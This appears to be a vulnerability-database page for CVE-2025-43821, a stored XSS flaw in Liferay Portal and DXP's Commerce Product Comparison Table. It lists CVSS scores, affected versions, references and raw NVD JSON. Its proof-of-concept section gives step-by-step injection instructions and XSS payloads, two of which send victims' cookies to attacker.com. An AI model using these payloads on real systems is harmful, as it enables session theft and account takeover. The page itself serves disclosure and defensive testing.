CVE-2025-43821

Description

Cross-site scripting (XSS) vulnerability in the Commerce Product Comparison Table widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:update10:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.0 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 GA - 7.4 Update 92

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-43821 PoC: Stored XSS via Commerce Product Name field -->
<!-- Step 1: Login as a user with Commerce product edit permissions -->
<!-- Step 2: Navigate to Commerce > Products > Edit/Create a product -->
<!-- Step 3: In the Product Name field, inject the following payload: -->

<script>alert('XSS-CVE-2025-43821');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Alternative payloads for testing: -->

<!-- Payload 1: Basic script injection -->
<img src=x onerror=alert(document.domain)>

<!-- Payload 2: Cookie exfiltration -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

<!-- Payload 3: Event handler injection -->
<svg onload=alert('XSS')>

<!-- Step 4: Save the product -->
<!-- Step 5: Add the product to a Product Comparison Table -->
<!-- Step 6: When another user views the comparison table, the script executes -->

// Automated exploitation example using curl (for authorized testing only):
// POST /group/control_panel/manage/-/commerce/products/[product-id] HTTP/1.1
// Content-Type: application/x-www-form-urlencoded
// 
// _com_liferay_commerce_product_web_internal_portlet_CPDefinitionsPortlet_productName=<script>alert('XSS')</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43821
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43821
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43821/
[4] VulDB https://vuldb.com/cve/CVE-2025-43821
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43821

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43821", "sourceIdentifier": "[email protected]", "published": "2025-10-08T13:15:34.430", "lastModified": "2025-12-15T18:09:41.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the Commerce Product Comparison Table widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:-:*:*:*:*:*:*", "matchCriteriaId": "96E84DBC-C740-4E23-8D1D-83C8AE49813E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update1:*:*:*:*:*:*", "matchCriteriaId": "8B1B2384-764F-43CC-8206-36DCBE9DDCBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update10:*:*:*:*:*:*", "matchCriteriaId": "C7B02106-D5EA-4A59-A959-CCE2AC8F55BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update11:*:*:*:*:*:*", "matchCriteriaId": "80204464-5DC5-4A52-B844-C833A96E6BD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update12:*:*:*:*:*:*", "matchCriteriaId": "6F8A5D02-0B45-4DA9-ACD8-42C1BFF62827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update13:*:*:*:*:*:*", "matchCriteriaId": "38DA7C99-AC2C-4B9A-B611-4697159E1D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update14:*:*:*:*:*:*", "matchCriteriaId": "F264AD07-D105-4F00-8920-6D8146E4FA63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update15:*:*:*:*:*:*", "matchCriteriaId": "C929CF16-4725-492A-872B-0928FE388FC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update16:*:*:*:*:*:*", "matchCriteriaId": "1B8750A1-E481-48D4-84F4-97D1ABE15B46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update17:*:*:*:*:*:*", "matchCriteriaId": "454F8410-D9AC-481E-841C-60F0DF2CC25E"}, {"vulnerable": tr ... (truncated)